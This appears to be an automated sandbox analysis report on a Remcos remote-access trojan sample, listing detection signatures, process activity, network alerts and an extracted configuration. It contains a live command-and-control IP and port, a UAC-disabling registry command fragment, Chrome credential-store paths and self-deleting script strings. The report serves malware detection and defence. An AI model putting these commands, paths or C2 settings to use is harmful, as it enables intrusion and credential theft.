Windows Analysis Report
17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe

Overview

General Information

Sample name:17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
Analysis ID:1584334
MD5:41496241ae1ad7c561d749f7d479caff
SHA1:e2935d471b03f8efc40460d29e2c07ee5a26f8de
SHA256:ad4a934328e699a5065c7c55ab3399d74134b5e97401175948b5296faf98d2a8
Tags:base64-decoded, exe, user-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Contains functionality to bypass UAC (CMSTPLUA)
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Machine Learning detection for sample
Maps a DLL or memory area into another process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe (PID: 1220 cmdline: "C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe" MD5: 41496241AE1AD7C561D749F7D479CAFF)
    • chrome.exe (PID: 5388 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 3060 cmdline: "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2028,i,10613890657641571661,3142487454969879835,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • msedge.exe (PID: 7868 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
      • msedge.exe (PID: 8064 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1984,i,1963966134464730034,17582007813680057049,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • msedge.exe (PID: 8084 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 7232 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3104 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8396 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6724 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8408 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6868 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 8652 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6336 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 8664 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6336 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["195.133.78.18:7346:1"], "Assigned name": "chesguyce", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "fyhstga-ONSWMZ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
        Source | Rule | Description | Author | Strings
        17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
        17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
        17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
        17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | Windows_Trojan_Remcos_b296e965 | unknown | unknown
        • 0x6aaf8:$a1: Remcos restarted by watchdog!
        • 0x6b070:$a3: %02i:%02i:%02i:%03i
        17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | REMCOS_RAT_variants | unknown | unknown
        • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x64e04:$str_b2: Executing file:
        • 0x65c3c:$str_b3: GetDirectListeningPort
        • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x65780:$str_b7: \update.vbs
        • 0x64e2c:$str_b9: Downloaded file:
        • 0x64e18:$str_b10: Downloading file:
        • 0x64ebc:$str_b12: Failed to upload file:
        • 0x65c04:$str_b13: StartForward
        • 0x65c24:$str_b14: StopForward
        • 0x656d8:$str_b15: fso.DeleteFile "
        • 0x6566c:$str_b16: On Error Resume Next
        • 0x65708:$str_b17: fso.DeleteFolder "
        • 0x64eac:$str_b18: Uploaded file:
        • 0x64e6c:$str_b19: Unable to delete:
        • 0x656a0:$str_b20: while fso.FileExists("
        • 0x65349:$str_c0: [Firefox StoredLogins not found]
                Source | Rule | Description | Author | Strings
                00000000.00000002.4568387682.00000000007CE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
                00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
                00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
                00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
                00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
                • 0x146f8:$a1: Remcos restarted by watchdog!
                • 0x14c70:$a3: %02i:%02i:%02i:%03i
                      Source | Rule | Description | Author | Strings
                      0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
                      0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
                      0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
                      0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
                      • 0x6aaf8:$a1: Remcos restarted by watchdog!
                      • 0x6b070:$a3: %02i:%02i:%02i:%03i
                      0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack | REMCOS_RAT_variants | unknown | unknown
                      • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
                      • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                      • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                      • 0x64e04:$str_b2: Executing file:
                      • 0x65c3c:$str_b3: GetDirectListeningPort
                      • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                      • 0x65780:$str_b7: \update.vbs
                      • 0x64e2c:$str_b9: Downloaded file:
                      • 0x64e18:$str_b10: Downloading file:
                      • 0x64ebc:$str_b12: Failed to upload file:
                      • 0x65c04:$str_b13: StartForward
                      • 0x65c24:$str_b14: StopForward
                      • 0x656d8:$str_b15: fso.DeleteFile "
                      • 0x6566c:$str_b16: On Error Resume Next
                      • 0x65708:$str_b17: fso.DeleteFolder "
                      • 0x64eac:$str_b18: Uploaded file:
                      • 0x64e6c:$str_b19: Unable to delete:
                      • 0x656a0:$str_b20: while fso.FileExists("
                      • 0x65349:$str_c0: [Firefox StoredLogins not found]

                      System Summary

                      Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe", ParentImage: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, ParentProcessId: 1220, ParentProcessName: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, ProcessCommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 5388, ProcessName: chrome.exe
                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2025-01-05T08:39:01.391447+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49709 | 195.133.78.18 | 7346 | TCP
                      2025-01-05T08:39:02.625764+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49711 | 195.133.78.18 | 7346 | TCP
                      2025-01-05T08:39:02.625991+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49710 | 195.133.78.18 | 7346 | TCP
                      2025-01-05T08:39:03.736476+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.6 | 49712 | 178.237.33.50 | 80 | TCP

                      AV Detection

                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeAvira: detected
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeMalware Configuration Extractor: Remcos {"Host:Port:Password": ["195.133.78.18:7346:1"], "Assigned name": "chesguyce", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "fyhstga-ONSWMZ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeVirustotal: Detection: 75%Perma Link
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeReversingLabs: Detection: 71%
                      Source: Yara matchFile source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.4568387682.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTR
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_0043294A
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,4_2_00404423
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_2400e094-f

                      Exploits

                      Source: Yara matchFile source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTR

                      Privilege Escalation

                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00406764 _wcslen,CoGetObject,0_2_00406764
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49713 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49853 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50011 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50069 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50070 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50071 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50072 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50073 version: TLS 1.2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040B335
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,0_2_0041B43F
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040B53A
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0044D5F9 FindFirstFileExA,0_2_0044D5F9
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,0_2_004089A9
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00406AC2 FindFirstFileW,FindNextFileW,0_2_00406AC2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,0_2_00407A8C
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00418C79
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,0_2_00408DA7
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_028310F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_028310F1
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_02836580 FindFirstFileExA,0_2_02836580
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10005C00 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_10005C00
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10007E20 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_10007E20
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_100073F0 FindFirstFileW,FindNextFileW,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,0_2_100073F0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10018AD0 FindFirstFileExA,0_2_10018AD0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,4_2_0040AE51
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407EF8
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407898
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00406F06
                      Source: chrome.exeMemory has grown: Private usage: 26MB later: 52MB

                      Networking

                      Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49711 -> 195.133.78.18:7346
